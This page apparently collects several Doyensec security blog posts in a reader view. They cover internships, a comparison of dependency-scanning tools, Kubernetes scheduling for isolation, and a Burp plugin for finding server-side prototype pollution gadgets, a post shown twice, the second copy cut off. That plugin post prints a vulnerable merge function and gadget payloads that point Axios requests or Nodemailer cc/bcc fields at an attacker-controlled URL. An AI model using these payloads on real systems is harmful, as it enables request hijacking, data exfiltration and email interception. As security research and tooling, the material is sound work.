❌

Reading view

There are new articles available, click to refresh the page.

Internship Experiences at Doyensec

The following blog post gives a voice to our 2023 interns and their experiences with us.

Aleandro

During my last high school year I took part in the Cyberchallenge.it program, whose goal is to introduce young students to the world of offensive cybersecurity, via lessons and CTFs competitions. After that experience, some friends and I founded the r00tstici CTF team, attempting to bring some cybersecurity culture to the south of Italy. We also organized various workshops and events at the University of Salento.

Once I moved from south of Italy to Pisa, to study at the university, I joined the fibonhack CTF team. I then also started working as a developer and penetration tester on small projects, both inside the university and outside.

Getting recruited

During April 2023, the Doyensec Twitter account posted a call for summer interns. Since I had been following Doyensec for months, after Luca’s talk at No Hat 2022, I submitted my application. This was both because I was bored with the university routine and because I also wanted to try a job in the research field. This was a good fit, since I was coming from an environment of development and freelance pentesting, alongside CTF competitions.

The selection process I went through has already been described, in large part, by Robert in his previous post about his internship experience. Basically it consisted of:

  • An interview with the Practice Manager
  • A technical challenge on both web and mobile topics
  • Finally, a technical interview with two different security engineers

The interview was about various aspects of application security. This ranged from web security to low level stuff like assembly and even CPU internals.

First weeks

The actual internship started with a couple of weeks of research, where I went through some web application frameworks in Rust. After completing that research, I then moved on to an actual pentest for a client. I remember the first week felt really different and challenging. The code base was so large and so filled with functionalities that I felt overwhelmed with things to test, ideas to try and scenarios to replicate. Despite the size and complexity, there were initially no vulnerabilities found. Impostor syndrome started to kick in.

Eventually, things started to improve during the second week of that engagement. While we’re a 100% remote company, sometimes we get together to work in small teams. That week, I worked in-person with Luca. He helped me understand that sometimes software is just well-written and well-architected from a security perspective. For those situations, I needed to learn how to deal with not having immediate success, the focus required for testing and how to provide value to the client despite having low severity findings. Thankfully, we eventually found good bugs in that codebase anyway :)

San Marino landscape

Research weeks

The main research topic of my internship experience was about developing internal tools. Although this project was not mainly about security, I enjoyed it a lot. Developing applications, fixing bugs and screaming about non-existent documentation is something I’ve done ever since I bought my first personal computer.

Responsibilities

It is important to note that even though you are the last one who has joined the company and have limited experience, all Doyensec team members treat you like all other employees. You could be in charge of actually talking with the client if you have any issues during an assessment, you will have to write and possibly peer review the reports, you will have to evaluate and assign severities to the vulnerabilities you’ve found, you will have your name on the report, and so on. Of course, you are assigned to work alongside more experienced engineers that will guide you through the process (Lorenzo in my case - who I would like to thank for helping me in managing the flexible schedule and for all the other advice he gave me). However, you learn the most by actually doing and making your own decisions on how to proceed and of course making errors.

To me this was a mind blowing feeling, I did not expect to be completely part of the team, and that my opinions would have mattered. It was really a good approach, in my opinion. It took me a while to fit entirely in the role, but then it was fun all along the way.

Leonardo

Hi, my name is Leonardo, some of you may better know me as maitai, which is the handle that I’ve been using in the CTF scene from the start of my journey. I encountered cybersecurity during my journey while earning my Bachelor of Science in computer science. From the very first moment I was amazed by it. So I decided to dig a bit more into hacking, starting with the PortSwigger Academy, which literally changed my life.

Getting recruited

If you have read the previous part of this blog post you have already met Aleandro. I knew him prior to joining Doyensec, since we played together on the same CTF team: fibonhack. While I was pursuing my previous internship, Aleandro and I talked a lot regarding our jobs and what to do in the near future. One day he told me that Doyensec would have an open internship position during the winter. I was a bit scared at first, just because it would be a really huge step for me to take on such a challenge. My previous internship had already ended when Doyensec opened the position. Although I was considering pursuing a master’s degree, I was still thinking about this opportunity all the time. I didn’t want to miss such a great opportunity, so I decided to submit my application. After all, what did I have to lose? I took it as a way to really challenge myself.

After a quick interview with the Practice Manager, I was made aware of the next steps in the interview process. First of all, the technical challenges used during the process were brand new. The Practice Manager told me that Doyensec had entirely renewed the challenges with a brand new platform and new challenges. I was essentially the first candidate to ever use this new platform.

The topics of the challenges were mostly web applications in several different languages, with different bugs to spot, alongside mobile challenges that involved the use of state-of-art technologies. I had 2 hours to complete as many challenges as I could, from a pool of 8. The time constraint was right in my opinion. You have around 15 minutes per challenge, which is a reasonable amount of time. Even though I wasn’t experienced with mobile hacking, I pushed myself to the limit in order to find as many bugs as possible and eventually to pass onto the next steps of the interview process. It was later explained to me that the review of numerous (but short) code snapshots in a limited time-frame is meant to simulate the complexity of reviewing larger codebases with several weeks at your disposal.

A couple of days after the technical challenges I received an email from Doyensec in which they congratulated me for passing the technical challenges. I was thrilled at that point! I literally couldn’t wait for what would come after that! The email stated that the next step was a technical call with Luca. I reserved a spot on his calendar and waited for the day of the interview.

Luca asked me several questions, ranging from threat modeling to how to exploit certain vulnerabilities, to how to patch vulnerable code. It was a 360 degree interview. It also included some live code review. The interview lasted for an hour or so, and in the end Luca said that he will evaluate my performance and he will let me know. The day after, another email arrived. I had advanced to the final step, the interview with John, Doyensec’s other co-founder. During this interview, he asked me about different things, not strictly related to the application security world. As I said before, they examined me from many angles. The meeting with John also lasted for an hour. At this point, I had completed the whole process. I only needed to wait for their response, which didn’t take too long to come.

They offered me the internship position. I did it! I was happy to have overcome the challenge that I set for myself. I quickly accepted the position in order to jump straight into the action!

First weeks

In my first weeks, I did a lot of different things including retesting web and network level bugs, in order to be sure that all the vulnerabilities previously found by other engineers were properly fixed. I also did standard web application penetration testing. The application itself was really interesting and complex enough to keep my eyes glued to the screen, without losing interest in it. Another amazing engineer was assigned to the aforementioned project with me, so I was not alone during testing.

Since Doyensec is a fully remote company, we also need to hold some meetings during the day, in order to synchronize on different things that can happen during the penetration test. Communication is a key part of Doyensec, and from great communication comes great bugs.

Research weeks

During the internship, you’re also given 50% of your time to perform application security R&D. During my research weeks I was assigned to an open source project. In fact, I was tasked to write some plugins for Google’s web security scanner Tsunami. This is a general purpose network security scanner, with an extensible plugins system for detecting high severity vulnerabilities with high confidence. Essentially, writing a plugin for Tsunami requires understanding a certain vulnerability in a product and writing an exploit for it, that can be used to confirm its existence when scanning. I was assigned to write two plugins which detect weak credentials on the RabbitMQ Management Portal and RStudio server. The plugins are written in Java, and since I’ve done a bit of Java programming during my Bachelor’s degree program I felt quite confident about it.

I really enjoyed writing those plugins and was also asked to write unit tests and a testbed that were used to actually reproduce the vulnerabilities. It was a really fun experience!

Responsibilities

As Aleandro already explained, interns are given a lot of responsibilities along with a great sense of freedom at Doyensec. I would add just one thing, which is about time management. This is one of the most difficult things for me to do. In a remote company, you don’t have time clocks or similar, so you can choose to work the way that you prefer. Luca told me several times that at Doyensec the output is what is evaluated. This is a big thing for me to deal with since I was used to work a fixed schedule. Doyensec gave me the flexibility to work in the way I prefer, which for me, is invaluable. That said, the activities are complex enough to keep you busy for several hours a day, but they are so enjoyable.

Conclusions

Being an intern at Doyensec is an awesome experience because it allows you to jump into the world of application security without the need for extensive job experience. You can be successful as long as you have the skills and knowledge, regardless of how you acquired them.

Moreover, during those three months you’ll be able to test your skills and learn new ones on different technologies across a variety of targets. You’ll also get to know passionate and skilled people, and if you’re lucky enough, take part in company retreats and get some exclusive swag.

Gift from the retreat

In the end, you should consider applying for the next call for interns, if you:

  • are passionate about application security
  • have already good web security skills
  • have organizational capabilities
  • want scheduling flexibility
  • can manage remote work

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Summer Internship 2024.

A Look at Software Composition Analysis

Software Supply Chain as a factory assembly line

Background

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, with open source and off-the-shelf tools. Modern comprehensive versions of these tools offer the capabilities to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).

Finding the right tool

Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications, with cloud components to them and the last is integrated into the GitHub(.com) environment directly. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep, to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of these, with regards to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

It’s time to ignore most of dependency alerts.

You will find the results of this latest analysis here on our research page. Included in that whitepaper, we describe the process taken to develop the testing corpus and our methodology. In short, the aim was to determine which tool could provide the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. This scenario was thought to be the optimal real-world scenario for most security teams, because most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low fidelity tools in the hopes of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempts at implementing deployment blocking as a result of CI/CD testing are unlikely to tolerate more than a minimal amount of false positives.

False Positive Rate

More to Come

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at [email protected].

Unveiling the Prototype Pollution Gadgets Finder

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what β€œsources” and β€œgadgets” are.

  • Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
    • Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
    • Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments that fail to validate the safety of the objects being merged or extended.
// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}
  • Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

  • PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.

  • On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burpsuite plugin for detecting gadgets in server-side prototype pollution: the Prototype Pollution Gadgets Finder, available at GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}

Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

Furthermore, all gadgets introduced by the plugin operate out-of-bounds (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited, once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.

Plugin Screenshot

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
"payload": {"<parameter>": "<URL>"},
"description": "<Description>",
"null_payload": {"<parameter>": {}}
}
  • Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
  • Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
  • Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively β€œde-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

  • Vulnerable Code Example:
    app.get("/get-api-key", async (req, res) => {
      try {
          const instance = axios.create({baseURL: "https://doyensec.com"});
          const response = await instance.get("/?api-key=<API_KEY>");
      }
    });
    
  • Gadget Explanation: Manipulating the baseURL parameter allows for the redirection of HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in the ability to suggest that outgoing HTTP requests could be rerouted through an attacker-controlled proxy. While Burp Collaborator itself does not support acting as a proxy to directly capture or manipulate these requests, the subtle fact that it can detect DNS lookups initiated by the application is crucial. The ability to observe the DNS requests to domains we control, triggered by poisoning the proxy configuration, indicates the application’s acceptance of this poisoned configuration. It highlights the potential vulnerability without the need to directly observe proxy traffic. This insight allows us to infer that with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to intercept and manipulate HTTP communications fully, demonstrating the vulnerability’s potential exploitability.

  • Gadget for Axios:
    {
      "payload": {"baseURL": "https://<URL>"},
      "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
      "null_payload": {"baseURL": {}}
    },
    {
      "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
      "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
      "null_payload": {"proxy": {}}
    }
    

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

  • Vulnerable Code Example:
    transporter.sendMail(mailOptions, (error, info) => {
      if (error) {
          res.status(500).send('500!');
      } else {
          res.send('200 OK');
      }
    });
    
  • Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communication.

  • Gadget for Nodemailer:
    {
      "payload": {"cc": "email@<URL>"},
      "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
      "null_payload": {"cc": {}}
    },
    {
      "payload": {"bcc": "email@<URL>"},
      "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
      "null_payload": {"bcc": {}}
    }
    

Gadget Found

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying new gadgets and sharing them. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.

Kubernetes Scheduling And Secure Design

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns.

Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, Admission Controllers, Network Policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced.

By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

CloudsecTidbit
Attackers on a compromised Pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following methods to apply a scheduling strategy will be discussed:

Mechanisms For Workloads Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, multiple applications with different authorization may lead to privileged pods sharing the node with pods having PII data mounted or different security risk level.

1. nodeSelector

Among the constraints, it is the simplest one operating by just specifying the target node labels inside the pod specification.

Example Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nodeSelector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on pods respecting all of them.

While it is very useful in low-complexity environments, it could easily become a bottleneck stopping executions if many selectors are specified and not satisfied by nodes.

Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.

2. nodeName

If the nodeName field in the Spec is set, the kube scheduler simply passes the Pod to the kubelet, which then attempts to assign the Pod to the specified node.

In that sense, nodeName overwrites other scheduling rules (e.g. nodeSelector,affinity, anti-affinity etc.) since the scheduling decision is pre-defined.

Example Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

  • The Pod will not run if the node in the spec is not running or if it is out of resources to host it
  • Cloud environments like AWS EKS come with non predictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: De-facto such approach invalidates all the computational efficiency benefits of the scheduler and it should be only applied on small groups of critical workloads easy to manage.

3. Affinity & Anti-affinity

The NodeAffinity feature enables the possibility to specify rules for pod scheduling based on some characteristics or labels of nodes. They can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either β€œpreferred” (soft) or β€œrequired” (hard): If it’s set as preferredDuringSchedulingIgnoredDuringExecution, this indicates a soft rule. The scheduler will try to adhere to this rule but may not always do so, especially if adhering to the rule would make scheduling impossible or challenging. If it’s set as requiredDuringSchedulingIgnoredDuringExecution, it’s a hard rule. The scheduler will not schedule the pod unless the condition is met. This can lead to a pod remaining unscheduled (pending) if the condition isn’t met.

In particular, anti-affinity rules could be leveraged to protect critical workloads from sharing the Kubelet with non-critical ones. By doing so, the lack of computational optimization will not affect the entire node pool, but just a few instances that will contain business-critical units.

Example of node affinity

apiVersion: v1
kind: Pod
metadata:
  name: node-affinity-example
spec:
  affinity:
   nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
       - weight: 1
         preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            -  segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

The node is preferred to be in a specific network segment by label and it is required to match either p0 or p1 workloadtype (custom strategy).

Multiple operators are available (https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/#operators) and NotIn and DoesNotExist are the specific ones usable to obtain node anti-affinity.

From a security standpoint, only hard rules requiring the conditions to be respected matter. preferredDuringSchedulingIgnoredDuringExecution should be used for computational configurations that can not affect the security posture of the cluster.

4. Inter-pod affinity and anti-affinity

Inter-pod affinity and anti-affinity could constrain which nodes the pods can be scheduled on based on the labels of pods already running on that node.
As specified in Kubernetes documentation:

β€œInter-pod affinity and anti-affinity rules take the form β€œthis Pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more Pods that meet rule Y”, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase

In the podAntiAffinity case above, we will never see the pod running on a node where a testdatabase app is running.

It fits designs where it is desired to schedule some pods together or where the system must ensure that certain pods are never going to be scheduled together.

In particular, the inter-pod rules allow engineers to define additional constraints within the same execution context without further creating segmentation in terms of node groups. Nevertheless, complex affinity rules could create situations with pods stuck in pending status.

5. Taints and Tolerations

Taints are the opposite of node affinity properties since they allow a node to repel a set of pods not matching some tolerations.

Taints can be applied to a node to make it repel pods unless they explicitly tolerate the taints.

Tolerations are applied to pods. Tolerations allow the scheduler to schedule pods with matching taints. It should be highlighted that while tolerations allow scheduling, the decision is not guaranteed.

Each node also defines an action linked to each taint: NoExecute (affects running pods), NoSchedule (hard rule), PreferNoSchedule (soft rule).

The approach is ideal for environments where strong isolation of workloads is required. Moreover, it allows the creation of custom node selection rules not based solely on labels and it does not leave flexibility.

6. Pod topology spread constraints

You can use topology spread constraints to control how Pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.

7. Not satisfied? Custom Scheduler To The Rescue

Kubernetes by default uses the kube-scheduler which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that the default scheduler might not know about. Writing a custom scheduler allows an organization to apply a risk-based scheduling to avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

  • Watches for unscheduled pods
  • Implements a scheduling algorithm to decide on which node the pod should run
  • Communicates the decision to the Kubernetes API server.

Some examples of a custom scheduler that can be adapted for this can be found at the following GH repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics - Mateo Burillo, Sysdig. As mentioned in the talk, this is not for the faint of heart because of the complexity and you might be better off just sticking with the default one if you are not already planning to build one.

Offensive Tips: Scheduling policies are like magnets

As described, scheduling policies could be used to attract or repel pods into specific group of nodes.

As previously stated, a proper strategy reduces the blast radius of a compromised pod. Nevertheless, there are still some aspects to take care about from the attacker perspective.

In specific cases, the implemented mechanisms could be used either to:

  • Attract critical pods - A compromised node or role able to edit the metadata could be abused to attract pods interesting for the attacker by manipulating the labels of a controlled node.
    • Carefully review roles and internal processes that could be abused to edit the metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing the labels and taints
  • Avoid rejection on critical nodes - If users are supposed to submit pod specs or have indirect control over how they are dynamically structured could be abused with scheduling sections. An attacker able to submit Pod Specs could use scheduling preferences to jump to a critical node.
    • Always review the scheduling strategy to find out the options allowing pods to land on nodes hosting critical workloads. Verify if the user-controlled flows allow adding them or if the logic could be abused by some internal flow
  • Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied stategy could allow a privileged attacker to craft pods to block legit workloads at the scheduling decision.
    • Look for potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node labels security
Normally, the kubelet will still be able to modify labels for a node, potentially allowing a compromised node to tamper its own labels to trick the scheduler as described above.

A security measure could be applied with the NodeRestriction admission plugin. It basically denies labels editing from the kubelet if the following prefix is present in the label.

Wrap-up: Time to take the scheduling decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, the design would not exploit the kubernetes capability to optimize computations.

The following examples represent some trade-off choices:

  • Isolate critical namespaces/workloads on their own node group
  • Reserve a node for critical pods of each namespace
  • Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads.

Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risk:

  • Different teams, different trust level
    It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risks.

  • Data being processed or stored
    Some pods may require mounting customer data or having persistent secrets to perform tasks. Sharing the node with any workload with less hardened workloads may expose the data to a risk

  • Exposed network services on the same node
    Any pod that exposes a network service increases its attack surface. Pods interacting with external-facing requests may suffer from this exposure and be more at risk of compromise.

  • Pod privileges and capabilities, or its assigned risk
    Some workloads may need some privileges to work or may run code that by its own nature process potentially unsafe content or third-party vendor code. All these factors can contribute to increase a workload’s assigned risk.

Once found the set of risks within the environment, decide the isolation level for teams/data/network traffic/capabilities. Grouping them if they are part of the same process could do the trick.

At that point, the amount of workloads in each isolation group should be evaluable and ready to be addressed by mixing the scheduling strategies according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.

Unveiling the Server-Side Prototype Pollution Gadgets Scanner

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what β€œsources” and β€œgadgets” are.

  • Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
    • Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
    • Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments that fail to validate the safety of the objects being merged or extended.
// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}
  • Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

  • PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.

  • On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burp Suite plugin for detecting gadgets in server-side prototype pollution: the Server-Side Prototype Pollution Gadgets Scanner, available at GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}

Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

